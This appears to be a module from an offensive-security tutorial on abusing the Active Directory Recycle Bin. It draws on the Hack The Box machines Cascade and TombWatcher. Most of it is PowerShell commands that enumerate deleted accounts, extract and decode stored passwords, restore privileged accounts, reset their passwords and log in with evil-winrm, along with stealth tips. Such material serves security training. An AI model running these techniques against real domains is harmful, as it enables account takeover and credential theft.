Back to All Modules

AD Recycle Bin Attacks

#Overview

The Active Directory Recycle Bin, introduced in Windows Server 2008 R2, preserves deleted AD objects with all their attributes intact, allowing recovery. When an attacker gains access to a user with appropriate permissions over the Recycle Bin (or the OU where deleted objects resided), they can enumerate deleted user accounts, service accounts, and groups. Deleted objects often contain hardcoded passwords in custom attributes, group memberships that reveal privilege chains, and metadata useful for understanding the domain structure. In some cases (as in Cascade HTB), a deleted administrative account with a known password provides a direct path to Domain Admin.

#Prerequisites

  • A domain user account with read permissions on deleted objects (Authenticated Users by default)
  • For recovery: permissions on the target's lastKnownParent OU, or membership in a group with OU-level control
  • Windows PowerShell with ActiveDirectory module, or an on-host shell

#Detection & Enumeration

#Verify Recycle Bin is Enabled

# Check if the AD Recycle Bin optional feature is active
Get-ADOptionalFeature 'Recycle Bin Feature'
# Look for: EnabledScopes populated, Name = "Recycle Bin Feature"

# Alternative LDAP query
# CN=Recycle Bin Feature,CN=Optional Features,CN=Directory Service,CN=Windows NT,
# CN=Services,CN=Configuration,DC=<domain>,DC=<tld>
POWERSHELL

#Enumerate Deleted Objects

# List all deleted objects (excluding the Deleted Objects container itself)
Get-ADObject -Filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' \
  -IncludeDeletedObjects

# List only deleted user accounts
Get-ADObject -LDAPFilter "(&(objectclass=user)(isDeleted=TRUE))" \
  -IncludeDeletedObjects

# Include useful properties: objectSid and lastKnownParent
Get-ADObject -Filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' \
  -IncludeDeletedObjects -Properties objectSid, lastKnownParent

# Filter for specific display name
Get-ADObject -LDAPFilter "(&(objectclass=user)(DisplayName=TempAdmin)(isDeleted=TRUE))" \
  -IncludeDeletedObjects -Properties *

# The lastKnownParent attribute shows which OU the object was deleted from
# This is critical for determining if you have recovery rights
POWERSHELL

#Key Attributes in Deleted Objects

# Dump all properties of a specific deleted object
# Important attributes to examine:
# - userPrincipalName (UPN)
# - sAMAccountName (username)
# - description, info, comment (may contain passwords)
# - memberOf (group memberships — reveals privilege paths)
# - servicePrincipalName (SPNs)
# - lastKnownParent (OU origin for recovery)
# - custom application attributes (e.g., cascadeLegacyPwd, userPassword)
# - objectSid (the SID, including RID)
# - whenChanged, whenCreated (timestamps)

Get-ADObject -Identity "<objectGUID>" -IncludeDeletedObjects -Properties *
POWERSHELL

#Exploitation / Execution

#Restoring Deleted Privileged Objects

# Restore a deleted object by its ObjectGUID
# Requires permissions on the lastKnownParent OU
Restore-ADObject -Identity "938182c3-bf0b-410a-9aaa-45c8e1a02ebf"

# Verify the object is restored
Get-ADUser -Identity <samAccountName>

# From TombWatcher HTB:
# 1. Enumerate deleted objects
Get-ADObject -Filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' \
  -IncludeDeletedObjects -Properties objectSid, lastKnownParent
# Found cert_admin (deleted from OU=ADCS)

# 2. Restore the specific instance with RID 1111
Restore-ADObject -Identity "938182c3-bf0b-410a-9aaa-45c8e1a02ebf"
# Success: cert_admin restored to OU=ADCS

# 3. Reset the password on the restored account (requires OU-level permissions)
Set-ADAccountPassword cert_admin -NewPassword `
  (ConvertTo-SecureString 'NewPass123!' -AsPlainText -Force)
POWERSHELL

#Password Recovery from Deleted Attributes

# From Cascade HTB:
# 1. Enumerate deleted users
Get-ADObject -LDAPFilter "(&(objectclass=user)(isDeleted=TRUE))" -IncludeDeletedObjects

# 2. Find TempAdmin with specific DisplayName
Get-ADObject -LDAPFilter "(&(objectclass=user)(DisplayName=TempAdmin)(isDeleted=TRUE))" \
  -IncludeDeletedObjects -Properties *
# Found: cascadeLegacyPwd attribute with Base64-encoded password

# 3. Decode the password (Base64)
echo "YmFDVDNyMWFOMDBkbGVz" | base64 -d
# Output: baCT3r1aN00dles

# 4. Try the password on Administrator (password reuse)
evil-winrm -i <DC> -u Administrator -p 'baCT3r1aN00dles'
# Success: TempAdmin had same password as Administrator
POWERSHELL

#Gaining Recovery Permissions

# If you have GenericAll on the OU where the object was deleted,
# you can restore it and then reset its password
# (as demonstrated in TombWatcher with John -> ADCS OU -> cert_admin)

# BloodHound path:
# 1. User has GenericAll on specific OU
# 2. OU is the lastKnownParent of a deleted privileged account
# 3. Restore-ADObject + Set-ADAccountPassword for immediate access
POWERSHELL

#Automated Discovery

# Script to find all deleted users with interesting attributes
$deletedUsers = Get-ADObject -LDAPFilter "(&(objectclass=user)(isDeleted=TRUE))" \
  -IncludeDeletedObjects -Properties *

foreach ($user in $deletedUsers) {
    Write-Host "User: $($user.Name)"
    Write-Host "  SID: $($user.objectSid)"
    Write-Host "  LastKnownParent: $($user.lastKnownParent)"
    Write-Host "  sAMAccountName: $($user.sAMAccountName)"
    # Look for password-like attributes
    $props = $user | Select-Object description, info, comment, userPassword, *password*, *legacy*, *pwd*
    foreach ($prop in $props.PSObject.Properties) {
        if ($prop.Value) {
            Write-Host "  $($prop.Name): $($prop.Value)" -ForegroundColor Yellow
        }
    }
    Write-Host ""
}
POWERSHELL

#Common Pitfalls

  • Recycle Bin not enabled: This feature requires manual activation. If not enabled, deleted objects are tombstoned (most attributes stripped) and unrecoverable.
  • Multiple instances of same name: Objects deleted and re-created multiple times have multiple deleted instances. Identify the correct one by objectSid (RID).
  • Restore-ADObject permissions: You need write access on the lastKnownParent container. This is why GenericAll on the OU works.
  • Deleted objects with adminCount=1: Protected objects (like former Domain Admins) retain adminCount=1. Permission inheritance may be restricted.
  • Attribute differences: Not all attributes are preserved in the Recycle Bin (linked attributes like memberOf may not be preserved intact).

#OPSEC Considerations

  • Enumerating deleted objects is a passive LDAP query; generates standard directory read events
  • Restoring an object (Restore-ADObject) generates Event ID 5136 (directory service change)
  • Password resets on restored accounts generate Event ID 4724
  • The restored account appears as a new/restored object in the target OU — this may be noticed by administrators
  • Consider restoring, using, and then re-deleting the object for stealth (but the events remain)

#Post-Exploitation Value

  • Recover credentials from deleted accounts (hardcoded passwords in custom attributes)
  • Discover privilege chains through deleted group memberships
  • Restore a deleted privileged account (e.g., former Domain Admin, ADCS admin)
  • Map domain history and understand administrative structures
  • Recover deleted service accounts that may hold Kerberos delegation rights

#Cross-References

#Tool References

ToolLink
Get-ADObject (PowerShell)Built-in ActiveDirectory module
Restore-ADObject (PowerShell)Built-in ActiveDirectory module
Get-ADOptionalFeature (PowerShell)Built-in ActiveDirectory module
BloodHoundhttps://github.com/BloodHoundAD/BloodHound

#Source Machines

  • Cascade (Medium) — ArkSvc in AD Recycle Bin group -> recover deleted TempAdmin -> cascadeLegacyPwd (Base64) -> Admin password reuse -> Administrator login
  • TombWatcher (Medium) — John has GenericAll over ADCS OU -> cert_admin deleted from ADCS OU -> Restore-ADObject -> Set-ADAccountPassword -> cert_admin -> ESC15 -> Administrator